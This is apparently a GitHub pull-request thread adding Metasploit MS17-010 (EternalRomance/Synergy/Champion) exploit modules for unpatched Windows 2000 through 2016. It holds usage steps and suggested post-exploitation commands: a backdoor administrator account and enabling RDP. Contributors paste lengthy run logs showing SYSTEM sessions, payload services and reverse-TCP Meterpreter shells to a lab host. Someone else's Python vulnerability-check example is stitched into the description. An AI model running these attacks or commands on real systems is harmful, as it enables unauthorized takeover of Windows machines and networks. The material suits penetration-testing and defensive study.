MS17-010 EternalSynergy / EternalRomance / EternalChampion aux+exploit modules #9473

Merged (31 commits) Feb 2, 2018

@zerosum0x0
Contributor

zerosum0x0 commented Jan 29, 2018

MS17-010 Windows SMB Remote Command and Code Execution modules for all vulnerable targets Windows 2000 through 2016 (and of course the standard home/workstation counterparts).

  • auxiliary/admin/smb/ms17_010_command (run a command)
  • exploit/windows/smb/ms17_010_psexec (stage a payload, i.e. meterpreter)

Screenshots: https://twitter.com/zerosum0x0/status/957839430777057280

You can run any command as SYSTEM, or stage Meterpreter. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.

This module is highly reliable and preferred over EternalBlue where a Named Pipe is accessible for anonymous logins (generally, everything pre-Vista, and relatively common for domain computers in the wild).

  • CVE-2017-0146 (EternalChampion/EternalSynergy) - exploit a race condition with Transaction requests
  • CVE-2017-0143 (EternalRomance/EternalSynergy) - exploit a type confusion between WriteAndX and Transaction requests

The exploit chain is an almost 1:1 skid port of @worawit's awesome zzz_exploit adaptation, which brings a few improvements over the original Eternal exploits. Instead of going for shellcode execution, it overwrites the SMB connection session structures to gain an Admin/SYSTEM session. The MSF module is leaner (stripped down packet count/padding), checks extra named pipes, sprinkles randomness where possible, and has Metasploit's psexec DCERPC implementation bolted onto it. For the last reason, Rex is used and not RubySMB.

Changes to MSF Lib

The exploit needs a smaller SMB Max Buffer Size than the hard-coded values in the Rex SMB proto client libraries. I exposed this as a public member that defaults to the old value. Existing code should not be broken.

Most of the exploit code is in a new mix-in (to be shared for the aux and exploit).

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Authors and project maintainers are not responsible or liable for misuse of the software. Use responsibly.

AV/Firewall Warning

Unlike EternalBlue, the exploit module will drop to disk (or use a PowerShell command).

Standard rules apply when it comes to AV/firewall for the exploit module. The command module should work fine though, try some of the following:

  • net user xyz pw123 /add
  • net localgroup Administrators xyz /add
  • reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • tasklist /v (useful huge output when popping mass scans)
  • stage Empire, Koadic, etc.
  • RTFM

Test Progress

Should work on all unpatched versions of Windows 2000+ x86/x64.

  • Windows 2000 SP0 x86
  • Windows 2000 Professional SP4 x86
  • Windows 2000 Advanced Server SP4 x86
  • Windows XP SP0 x86
  • Windows XP SP1 x86
  • Windows XP SP2 x86
  • Windows XP SP3 x86
  • Windows XP SP2 x64
  • Windows Server 2003 SP0 x86
  • Windows Server 2003 SP1 x86
  • Windows Server 2003 Enterprise SP 2 x86
  • Windows Server 2003 SP1 x64
  • Windows Server 2003 R2 SP1 x86
  • Windows Server 2003 R2 SP2 x86
  • Windows Vista Home Premium x86
  • Windows Vista x64
  • Windows Server 2008 SP1 x86
  • Windows Server 2008 x64
  • Windows 7 x86
  • Windows 7 Ultimate SP1 x86
  • Windows 7 Enterprise SP1 x86
  • Windows 7 SP0 x64
  • Windows 7 SP1 x64
  • Windows Server 2008 R2 x64
  • Windows Server 2008 R2 SP1 x64
  • Windows 8 x86
  • Windows 8 x64
  • Windows Server 2012 x64
  • Windows 8.1 Enterprise Evaluation 9600 x86
  • Windows 8.1 SP1 x86
  • Windows 8.1 x64
  • Windows 8.1 SP1 x64
  • Windows Server 2012 R2 x86
  • Windows Server 2012 R2 Standard 9600 x64
  • Windows Server 2012 R2 SP1 x64
  • Windows 10 Enterprise 10.10240 x86
  • Windows 10 Enterprise 10.10240 x64
  • Windows 10 10.10586 x86
  • Windows 10 10.10586 x64
  • Windows Server 2016 10.10586 x64
  • Windows 10 10.0.14393 x86
  • Windows 10 Enterprise Evaluation 10.14393 x64
  • Windows Server 2016 Data Center 10.14393 x64

Asking for help in testing thoroughly. Provide crash dumps and pcaps in case of failure. Exploit should virtually never crash post-Vista, and only in extremely rare circumstances for earlier versions.

set VERBOSE 1
set DBGTRACE 1

Todo

Not necessarily for this PR, but some ideas for improvements.

  • MS17-010 auxiliary scanner functionality should be in a mix-in (to use for check()).
  • MS17-010 scanner should try named pipes on vulnerable targets.
  • Add 2000-2016 targets to EternalBlue module, it's still the best when named pipe isn't available.
  • Documentation

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/smb/ms17_010_psexec
  • use auxiliary/admin/smb/ms17_010_command
  • set VERBOSE 1
  • set DBGTRACE 1
  • Document the thing and how it works (Example)
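The Todo list above asks for the MS17-010 scanner logic to become a mix-in so the exploit can grow a check(). The following is an added example, written for this page and not code from the PR or from Metasploit, of the wire-level part of that check: build an SMB1 TRANS2 request carrying the SESSION_SETUP subcommand (0x0014) and classify the server's NT status. An unpatched srv.sys answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); a patched one answers STATUS_NOT_IMPLEMENTED or STATUS_ACCESS_DENIED. The example assumes the caller has already done the SMB negotiate, an anonymous session setup and a tree connect to IPC$ (giving the TID/UID), and the sample replies at the bottom are constructed, not captured traffic. Field names follow the SMB1 header layout; the Timeout value and the pad byte are the author's choices, not protocol requirements.

```python
"""MS17-010 TRANS2 SESSION_SETUP probe: request builder and reply classifier.

Added example for this page; not Metasploit code. Assumes negotiate, session
setup and tree connect to IPC$ were already performed by the caller.
"""
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_TRANSACTION2 = 0x32
TRANS2_SESSION_SETUP = 0x0014        # subcommand that is never valid over the wire
FLAGS2_NT_STATUS = 0x4000            # Status field is an NTSTATUS, not a DOS error

STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # unpatched srv.sys
STATUS_NOT_IMPLEMENTED = 0xC0000002           # patched srv.sys
STATUS_ACCESS_DENIED = 0xC0000022             # also seen from patched hosts


def smb1_header(command, status=0, flags2=0xC801, tid=0, pid=0xFEFF, uid=0, mid=0):
    """Return a 32-byte SMB1 header. Flags 0x18 = canonical paths, case-insensitive.
    flags2 0xC801 = Unicode | NT status | extended security | long names."""
    return struct.pack("<4sBIBHH8sHHHHH", SMB1_MAGIC, command, status, 0x18,
                       flags2, 0, b"\x00" * 8, 0, tid, pid, uid, mid)


def netbios_wrap(smb):
    """Prefix with the 4-byte NetBIOS session message header (type 0, 24-bit length)."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def build_trans2_session_setup(tid, uid):
    """TRANS2 request with subcommand 0x0014 and a 12-byte all-zero parameter block."""
    params = b"\x00" * 12
    # ParameterOffset counts from the first byte of the SMB header:
    # 32 (header) + 1 (WordCount) + 30 (words) + 2 (ByteCount) + 1 (pad) = 66
    words = struct.pack(
        "<HHHHBBHIHHHHHBBH",
        len(params),          # TotalParameterCount
        0,                    # TotalDataCount
        1,                    # MaxParameterCount
        0,                    # MaxDataCount
        0, 0,                 # MaxSetupCount, Reserved1
        0,                    # Flags
        0,                    # Timeout (author's choice; irrelevant for the check)
        0,                    # Reserved2
        len(params),          # ParameterCount
        66,                   # ParameterOffset
        0, 0,                 # DataCount, DataOffset
        1, 0,                 # SetupCount, Reserved3
        TRANS2_SESSION_SETUP, # Setup[0] = subcommand
    )
    body = bytes([15]) + words + struct.pack("<H", 1 + len(params)) + b"\x00" + params
    return netbios_wrap(smb1_header(SMB_COM_TRANSACTION2, tid=tid, uid=uid) + body)


def classify_ms17_010_response(raw):
    """Map the reply to the probe onto vulnerable / patched / not_smb1 / unknown.
    Returns (verdict, nt_status-or-None)."""
    if len(raw) < 4 + 32 or raw[0] != 0x00:
        return ("unknown", None)
    smb = raw[4:]
    if smb[:4] == SMB2_MAGIC:
        return ("not_smb1", None)            # SMB1 disabled: probe does not apply
    if smb[:4] != SMB1_MAGIC:
        return ("unknown", None)
    command, status, _flags, flags2 = struct.unpack_from("<BIBH", smb, 4)
    if command != SMB_COM_TRANSACTION2 or not flags2 & FLAGS2_NT_STATUS:
        return ("unknown", status)           # wrong command or DOS-style error code
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return ("vulnerable", status)
    if status in (STATUS_NOT_IMPLEMENTED, STATUS_ACCESS_DENIED):
        return ("patched", status)
    return ("unknown", status)


# Constructed sample replies (not captured traffic): an error reply is a bare
# header followed by WordCount 0 and ByteCount 0.
def sample_reply(status):
    return netbios_wrap(smb1_header(SMB_COM_TRANSACTION2, status=status) + b"\x00\x00\x00")


UNPATCHED_REPLY = sample_reply(STATUS_INSUFF_SERVER_RESOURCES)
PATCHED_REPLY = sample_reply(STATUS_NOT_IMPLEMENTED)

if __name__ == "__main__":
    for name, reply in (("unpatched", UNPATCHED_REPLY), ("patched", PATCHED_REPLY)):
        verdict, st = classify_ms17_010_response(reply)
        print(f"{name}: {verdict} (NT status 0x{st:08X})")
```

In a live check the packet from build_trans2_session_setup() goes out on the socket after the IPC$ tree connect, and the first reply is passed to classify_ms17_010_response(); a "vulnerable" verdict is what the named-pipe probing in this module would then build on.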
@bcoles

Contributor

bcoles commented Jan 29, 2018

YUS!

@wvu-r7

Contributor

wvu-r7 commented Jan 29, 2018

Hello again. :-)

@ctx['os'] = 'WIN7'
@ctx['go_fish'] = true
elsif os.starts_with? "Windows Server 2003 "
@ctx['os'] = 'WIN2K3'

@timwr

timwr Jan 29, 2018

Contributor

Indentation :trollface:

@zerosum0x0 zerosum0x0 changed the title from MS17-010 Eternalsynergy / EternalRomance / EternalChampion aux+exploit modules to MS17-010 EternalSynergy / EternalRomance / EternalChampion aux+exploit modules Jan 29, 2018

@bcoles

Contributor

bcoles commented Jan 29, 2018

Success on Windows XP SP3 (x86) with Automatic targeting (unauthenticated).

msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 172.16.191.135
rhost => 172.16.191.135
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] 172.16.191.135:445 - Target OS: Windows 5.1
[-] 172.16.191.135:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 172.16.191.135:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 172.16.191.135:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[*] 172.16.191.135:445 - Connected to named pipe: browser
[*] 172.16.191.135:445 - Filling barrel with fish... done
[*] 172.16.191.135:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.16.191.135:445 - 	[*] Preparing dynamite...
[*] 172.16.191.135:445 - Attempt controlling next transaction on x86
[*] 172.16.191.135:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 172.16.191.135:445 - 	[+] Successfully Leaked Transaction!
[*] 172.16.191.135:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 172.16.191.135:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 172.16.191.135:445 - Reading from CONNECTION struct at: 0x89a96da8
[*] 172.16.191.135:445 - Built a write-what-where primitive...
[*] 172.16.191.135:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xe1ce5824
[*] 172.16.191.135:445 - Found TOKEN addr: 0x3794415664
[*] 172.16.191.135:445 - UserAndGroupCount: 0x3
[*] 172.16.191.135:445 - UserAndGroupsAddr: 0xe22a30d0
[*] 172.16.191.135:445 - Overwriting token UserAndGroups...
[+] 172.16.191.135:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.191.135:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 172.16.191.135:445 - PowerShell not found
[*] 172.16.191.135:445 - Selecting native target
[*] 172.16.191.135:445 - Uploading payload...
[*] 172.16.191.135:445 - Created \SmvXrQeV.exe...
[*] 172.16.191.135:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.191.135[\svcctl] ...
[*] 172.16.191.135:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.191.135[\svcctl] ...
[*] 172.16.191.135:445 - Obtaining a service manager handle...
[*] 172.16.191.135:445 - Creating the service...
[+] 172.16.191.135:445 - Successfully created the service
[*] 172.16.191.135:445 - Starting the service...
[+] 172.16.191.135:445 - Service started successfully...
[*] 172.16.191.135:445 - Removing the service...
[+] 172.16.191.135:445 - Successfully removed the service
[*] 172.16.191.135:445 - Closing service handle...
[*] 172.16.191.135:445 - Deleting \SmvXrQeV.exe...
[-] 172.16.191.135:445 - Rex::Proto::SMB::Exceptions::NoReply
[-] 172.16.191.135:445 - The SMB server did not reply to our request
[-] 172.16.191.135:445 - /pentest/exploit/metasploit-framework/lib/rex/proto/smb/client.rb:74:in `smb_recv'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:1036:in `do_smb_echo'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:169:in `write_what_where'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:68:in `eternal_cleanup'
/pentest/exploit/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:115:in `exploit'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'
[*] Sending stage (179779 bytes) to 172.16.191.135
[*] Meterpreter session 1 opened (172.16.191.244:4444 -> 172.16.191.135:2546) at 2018-01-29 05:20:10 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINXP
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
@bcoles

Contributor

bcoles commented Jan 29, 2018

Success on Windows Vista Home Premium (x86) with Automatic targeting (unauthenticated).

msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 172.16.191.154
rhost => 172.16.191.154
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] 172.16.191.154:445 - Target OS: Windows Vista (TM) Home Premium 6000
[*] 172.16.191.154:445 - Connected to named pipe: netlogon
[*] 172.16.191.154:445 - Frag pool info leak: arch=x86, size=0x8
[*] 172.16.191.154:445 - Filling barrel with fish... done
[*] 172.16.191.154:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.16.191.154:445 - 	[*] Preparing dynamite...
[*] 172.16.191.154:445 - Attempt controlling next transaction on x86
[*] 172.16.191.154:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 172.16.191.154:445 - 	[+] Successfully Leaked Transaction!
[*] 172.16.191.154:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 172.16.191.154:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 172.16.191.154:445 - Reading from CONNECTION struct at: 0x9526f010
[*] 172.16.191.154:445 - Built a write-what-where primitive...
[*] 172.16.191.154:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0x9e923aa6
[*] 172.16.191.154:445 - Overwrote token SID security context with fake context
[+] 172.16.191.154:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.191.154:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 172.16.191.154:445 - PowerShell not found
[*] 172.16.191.154:445 - Selecting native target
[*] 172.16.191.154:445 - Uploading payload...
[*] 172.16.191.154:445 - Created \BdutpgkV.exe...
[*] 172.16.191.154:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.191.154[\svcctl] ...
[*] 172.16.191.154:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.191.154[\svcctl] ...
[*] 172.16.191.154:445 - Obtaining a service manager handle...
[*] 172.16.191.154:445 - Creating the service...
[+] 172.16.191.154:445 - Successfully created the service
[*] 172.16.191.154:445 - Starting the service...
[+] 172.16.191.154:445 - Service started successfully...
[*] 172.16.191.154:445 - Removing the service...
[+] 172.16.191.154:445 - Successfully removed the service
[*] 172.16.191.154:445 - Closing service handle...
[*] Sending stage (179779 bytes) to 172.16.191.154
[*] 172.16.191.154:445 - Deleting \BdutpgkV.exe...
[-] 172.16.191.154:445 - Rex::Proto::SMB::Exceptions::NoReply
[-] 172.16.191.154:445 - The SMB server did not reply to our request
[-] 172.16.191.154:445 - /pentest/exploit/metasploit-framework/lib/rex/proto/smb/client.rb:74:in `smb_recv'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:1036:in `do_smb_echo'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:169:in `write_what_where'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:73:in `eternal_cleanup'
/pentest/exploit/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:115:in `exploit'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.154:49169) at 2018-01-29 05:35:47 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : VISTA
OS              : Windows Vista (Build 6000).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
@bcoles

Contributor

bcoles commented Jan 29, 2018

Fail on Windows Server 2003 SP2 with Automatic targeting (unauthenticated).

msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 172.16.191.171
rhost => 172.16.191.171
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] 172.16.191.171:445 - Target OS: Windows Server 2003 R2 3790 Service Pack 2
[*] 172.16.191.171:445 - Connected to named pipe: netlogon
[*] 172.16.191.171:445 - Filling barrel with fish... done
[*] 172.16.191.171:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.16.191.171:445 - 	[*] Preparing dynamite...
[*] 172.16.191.171:445 - Attempt controlling next transaction on 
[*] 172.16.191.171:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 172.16.191.171:445 - 	[+] Successfully Leaked Transaction!
[*] 172.16.191.171:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 172.16.191.171:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 172.16.191.171:445 - Reading from CONNECTION struct at: 0x81305d48
[*] 172.16.191.171:445 - Built a write-what-where primitive...
[*] 172.16.191.171:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xe1051556
[*] 172.16.191.171:445 - Found TOKEN addr: 0x3778995736
[*] 172.16.191.171:445 - UserAndGroupCount: 0x5
[*] 172.16.191.171:445 - UserAndGroupsAddr: 0xe13ee6b8
[*] 172.16.191.171:445 - Overwriting token UserAndGroups...
[-] 172.16.191.171:445 - NoMethodError
[-] 172.16.191.171:445 - undefined method `pack' for 4:Fixnum
[-] 172.16.191.171:445 - /pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:132:in `modify_token'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:55:in `eternal_pwn'
/pentest/exploit/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:99:in `exploit'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'
[*] Exploit completed, but no session was created.
@bcoles

Contributor

bcoles commented Jan 29, 2018

Fail on Windows XP Professional SP0 (x86) with Automatic targeting (unauthenticated).

msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 172.16.191.158
rhost => 172.16.191.158
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] 172.16.191.158:445 - Target OS: Windows 5.1
[*] 172.16.191.158:445 - Connected to named pipe: netlogon
[*] 172.16.191.158:445 - Filling barrel with fish... done
[*] 172.16.191.158:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.16.191.158:445 - 	[*] Preparing dynamite...
[*] 172.16.191.158:445 - Attempt controlling next transaction on x86
[*] 172.16.191.158:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 172.16.191.158:445 - 	[+] Successfully Leaked Transaction!
[*] 172.16.191.158:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 172.16.191.158:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 172.16.191.158:445 - Reading from CONNECTION struct at: 0x85d84220
[*] 172.16.191.158:445 - Built a write-what-where primitive...
[*] 172.16.191.158:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xe192095c
[*] 172.16.191.158:445 - Found TOKEN addr: 0x3775231688
[*] 172.16.191.158:445 - UserAndGroupCount: 0x180
[*] 172.16.191.158:445 - UserAndGroupsAddr: 0xe1057750
[*] 172.16.191.158:445 - Overwriting token UserAndGroups...
[-] 172.16.191.158:445 - NoMethodError
[-] 172.16.191.158:445 - undefined method `pack' for 4:Fixnum
[-] 172.16.191.158:445 - /pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:132:in `modify_token'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:55:in `eternal_pwn'
/pentest/exploit/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:99:in `exploit'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'
[*] Exploit completed, but no session was created.
@ronnieflip

ronnieflip commented Jan 29, 2018

Damn, thanks a bunch. As soon as I deployed this on my early morning pentest I owned AD in seconds 🥇

@bcoles

Contributor

bcoles commented Jan 29, 2018

Success on Windows 2000 Professional SP4 (x86) with Automatic targeting (unauthenticated).

msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 172.16.191.160
rhost => 172.16.191.160
msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] 172.16.191.160:445 - Target OS: Windows 5.0
[*] 172.16.191.160:445 - Connected to named pipe: netlogon
[*] 172.16.191.160:445 - Filling barrel with fish... done
[*] 172.16.191.160:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.16.191.160:445 - 	[*] Preparing dynamite...
[*] 172.16.191.160:445 - Attempt controlling next transaction on x86
[*] 172.16.191.160:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 172.16.191.160:445 - 	[+] Successfully Leaked Transaction!
[*] 172.16.191.160:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 172.16.191.160:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 172.16.191.160:445 - Reading from CONNECTION struct at: 0x81e48690
[*] 172.16.191.160:445 - Built a write-what-where primitive...
[*] 172.16.191.160:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xe1d2b2c4
[*] 172.16.191.160:445 - Found TOKEN addr: 0x3786623280
[*] 172.16.191.160:445 - UserAndGroupCount: 0x4
[*] 172.16.191.160:445 - UserAndGroupsAddr: 0xe1b349c8
[*] 172.16.191.160:445 - Overwriting token UserAndGroups...
[+] 172.16.191.160:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.191.160:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 172.16.191.160:445 - PowerShell not found
[*] 172.16.191.160:445 - Selecting native target
[*] 172.16.191.160:445 - Uploading payload...
[*] 172.16.191.160:445 - Created \xJobxaMJ.exe...
[*] 172.16.191.160:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.191.160[\svcctl] ...
[*] 172.16.191.160:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.191.160[\svcctl] ...
[*] 172.16.191.160:445 - Obtaining a service manager handle...
[*] 172.16.191.160:445 - Creating the service...
[+] 172.16.191.160:445 - Successfully created the service
[*] 172.16.191.160:445 - Starting the service...
[+] 172.16.191.160:445 - Service started successfully...
[*] 172.16.191.160:445 - Removing the service...
[+] 172.16.191.160:445 - Successfully removed the service
[*] 172.16.191.160:445 - Closing service handle...
[*] Sending stage (179779 bytes) to 172.16.191.160
[*] 172.16.191.160:445 - Deleting \xJobxaMJ.exe...
[-] 172.16.191.160:445 - Rex::Proto::SMB::Exceptions::NoReply
[-] 172.16.191.160:445 - The SMB server did not reply to our request
[-] 172.16.191.160:445 - /pentest/exploit/metasploit-framework/lib/rex/proto/smb/client.rb:74:in `smb_recv'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:1036:in `do_smb_echo'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:169:in `write_what_where'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:68:in `eternal_cleanup'
/pentest/exploit/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:115:in `exploit'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/pentest/exploit/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/pentest/exploit/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
